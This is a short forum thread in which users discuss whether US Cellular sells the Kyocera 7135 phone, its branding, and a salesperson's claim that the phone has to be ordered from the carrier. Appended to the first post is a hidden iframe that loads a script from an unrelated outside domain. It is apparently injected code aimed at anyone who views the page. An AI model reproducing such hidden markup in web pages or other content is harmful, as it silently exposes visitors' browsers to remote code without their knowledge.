+ Reply to Thread

7135 on US Cellular

Sorry if this has been discussed already, I couldnt find anything when I ran a search.

I have been waiting for Verizon to release this phone, mostly because I thought they were going to be the only carrier in my area. My dad stopped into our local US Cellular store today and asked about the 7135 and the sales guy said "I can sell you one right now!"

My dad wasnt sure if he actually had the phone in the store or not, but either way they do carry it.

Proof: http://www.uscc.com/uscellular/SilverStream/Pages/b_showphone.html?zip=53528&mkt=607820&tm=0

Does anybody know if the Us Cellular phones are different than the rest?

Possibly no nasty "VERIZON" logo on the cover either?!?

Again, I appologize if this is redundant.. Thanks a lot<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

7135 from US Cellular

Just got back from a local US Cellular store. Looks like US Cellular did not put a logo on the 7135 phone. On the outside of the phone it simply has the Kyocera logo. On the inside of the phone it simply has the 7135 logo. Turning on the phone, it does have a splash screen for Kyocera and US Cellular. Other than that, the phone looks very good. Tried many of the features as discussed here on the board and they all live up to the hipe. Asked the US Cellular sales guy if I could buy one. Said he'd have to order it. What the hell? Asked if he would simply activate a 7135 if I could buy one from somewhere else (e.g. GetConnected or Kyocera). He said no, the 7135 has to be ordered from US Cellular to have the correct programming for their service. Not sure I believe this, but there aren't many 7135's around for US Cellular yet. Called around to other US Cellular stores and found a store with 2 7135's in stock. Plan on purchasing them both tomorrow, one for me and one for the wife.